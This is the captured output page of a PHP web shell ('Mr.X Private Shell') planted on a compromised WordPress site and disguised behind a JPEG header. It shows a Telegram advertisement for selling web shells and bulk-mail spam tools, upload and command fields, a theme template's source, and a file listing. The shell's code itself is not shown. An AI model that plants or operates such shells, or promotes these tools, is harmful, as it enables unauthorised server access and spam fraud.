����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

airtcsob@216.73.216.143: ~ $
<?php
/**
 * Template Name: Splash Page Experiences Template
 */
?>
<!DOCTYPE html>
<html <?php language_attributes(); ?>>
<head>
    <meta charset="<?php bloginfo('charset'); ?>">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0"/>
    <link rel="profile" href="http://gmpg.org/xfn/11">
    <link rel="pingback" href="<?php bloginfo('pingback_url'); ?>">

    <?php wp_head(); ?>
</head>


<body <?php body_class('splash-page splash-page-image'); ?>>
<?php
global $homey_local, $homey_prefix;
$homey_local = homey_get_localization();
$homey_prefix = 'homey_';
$search_template = homey_get_template_link('template/template-exp-search.php');
$splash_type = homey_option('background_type_exp');

$splash_layout = homey_option('splash_layout_exp');
$splash_search = homey_option('splash_search_exp');
if (isset($_GET['splash_type'])) {
    $splash_type = $_GET['splash_type'];
}
$splash_image = homey_option('splash_image_exp', false, 'url');
$mp4 = homey_option('splash_bg_mp4_exp', false, 'url');
$webm = homey_option('splash_bg_webm_exp', false, 'url');
$ogv = homey_option('splash_bg_ogv_exp', false, 'url');
$splash_video_image = homey_option('splash_video_image_exp', false, 'url');

$header_type = homey_option('header_type');
?>

<?php if ($splash_type == 'image') { ?>
<div class="banner-inner parallax" data-parallax-bg-image="<?php echo esc_url($splash_image); ?>">
<?php } else { ?>
<div class="banner-inner">
    <?php } ?>

    <?php
    if ($header_type == "1" || $header_type == "2" || $header_type == "3") {
        $header_type = '1';
    }
    get_template_part('template-parts/header/header', $header_type); ?>


    <?php if ($splash_type == 'slider') { ?>
        <script>
            jQuery(document).ready(function ($) {
                $('.splash-slider').slick({
                    lazyLoad: 'ondemand',
                    adaptiveHeight: true,
                    autoplay: true,
                    infinite: true,
                    speed: 300,
                    slidesToShow: 1,
                    arrows: false,
                });
            });
        </script>
        <div class="splash-slider">
            <?php
            $image_ids = homey_option('splash_slider_exp');
            $image_ids = explode(',', $image_ids);
            $images = '';
            foreach ($image_ids as $id) {
                $url = wp_get_attachment_image_src($id, array(2000, 1000));
                echo '<div class="splash-slider-item" style="background-image: url(' . esc_url(@$url[0]) . ');"></div>';
            }
            ?>
        </div><!-- background-slider -->
    <?php } ?>

    <?php if ($splash_type == 'video') {

        $ogv = substr($ogv, 0, strrpos($ogv, "."));
        $mp4 = substr($mp4, 0, strrpos($mp4, "."));
        $webm = substr($webm, 0, strrpos($webm, "."));
        $splash_video_image = substr($splash_video_image, 0, strrpos($splash_video_image, "."));
        ?>

        <div id="video-background" class="video-background splash-video-background"
             data-vide-bg="mp4: <?php echo esc_url($mp4); ?>, webm: <?php echo esc_url($webm); ?>, ogv: <?php echo esc_url($ogv); ?>, poster: <?php echo esc_url($splash_video_image); ?>"
             data-vide-options="position: 0% 50%">
        </div>
    <?php } ?>

    <div class="banner-caption <?php homey_banner_search_class(); ?>">

        <?php
        homey_banner_search_div_start();

        get_template_part('template-parts/banner/caption-exp');

        if ($splash_search != 0) {
            get_template_part('template-parts/search/banner-' . homey_banner_search_style() . '-exp');
        }

        homey_banner_search_div_end();
        ?>
        <?php get_footer(); ?>
    </div><!-- banner-caption -->
</div><!-- splash-page-inner -->

Filemanager

Name Type Size Permission Actions
dashboard-exp-payment.php File 16.95 KB 0644
dashboard-experience-submission.php File 8.29 KB 0644
dashboard-experience-submitted.php File 5.79 KB 0644
dashboard-experiences.php File 11.37 KB 0644
dashboard-favorites.php File 8.54 KB 0644
dashboard-invoices.php File 7.31 KB 0644
dashboard-listing-submitted.php File 6.84 KB 0644
dashboard-listings.php File 11.73 KB 0644
dashboard-membership-host.php File 11.66 KB 0644
dashboard-messages.php File 7.17 KB 0644
dashboard-payment.php File 16.84 KB 0644
dashboard-profile.php File 6.08 KB 0644
dashboard-reservations-experiences.php File 6.85 KB 0644
dashboard-reservations.php File 9.61 KB 0644
dashboard-reservations2-experiences.php File 1.16 KB 0644
dashboard-reservations2.php File 2.29 KB 0644
dashboard-submission.php File 7.79 KB 0644
dashboard-wallet.php File 4.39 KB 0644
dashboard.php File 2.75 KB 0644
template-compare-exp.php File 6.68 KB 0644
template-compare.php File 10.05 KB 0644
template-exp-search.php File 531 B 0644
template-experience-card.php File 6.54 KB 0644
template-experience-grid.php File 6.33 KB 0644
template-experience-list.php File 6.22 KB 0644
template-experience-sticky-map.php File 6.37 KB 0644
template-half-map-exp.php File 2.19 KB 0644
template-half-map.php File 2.17 KB 0644
template-homepage.php File 618 B 0644
template-ical-exp.php File 1.72 KB 0644
template-ical.php File 1.77 KB 0644
template-instance-booking.php File 1.06 KB 0644
template-instance-exp-booking.php File 831 B 0644
template-listing-all-reviews.php File 4.13 KB 0644
template-listing-as-page.php File 298 B 0644
template-listing-card.php File 6.7 KB 0644
template-listing-grid-v2.php File 7.03 KB 0644
template-listing-grid.php File 6.74 KB 0644
template-listing-list-v2.php File 6.74 KB 0644
template-listing-list.php File 6.34 KB 0644
template-listing-sticky-map.php File 6.58 KB 0644
template-membership-webhook.php File 37.93 KB 0644
template-page.php File 2.61 KB 0644
template-search.php File 495 B 0644
template-splash-exp.php File 3.74 KB 0644
template-splash.php File 3.35 KB 0644
template-stripe-charge-exp.php File 7.4 KB 0644
template-stripe-charge.php File 11.83 KB 0644
template-subscriptions-payment-complete.php File 23 KB 0644
template-subscriptions-stripe-charge.php File 3.98 KB 0644
template-verification.php File 2.76 KB 0644
template-woocommerce.php File 2.02 KB 0644
testing.php File 87 B 0644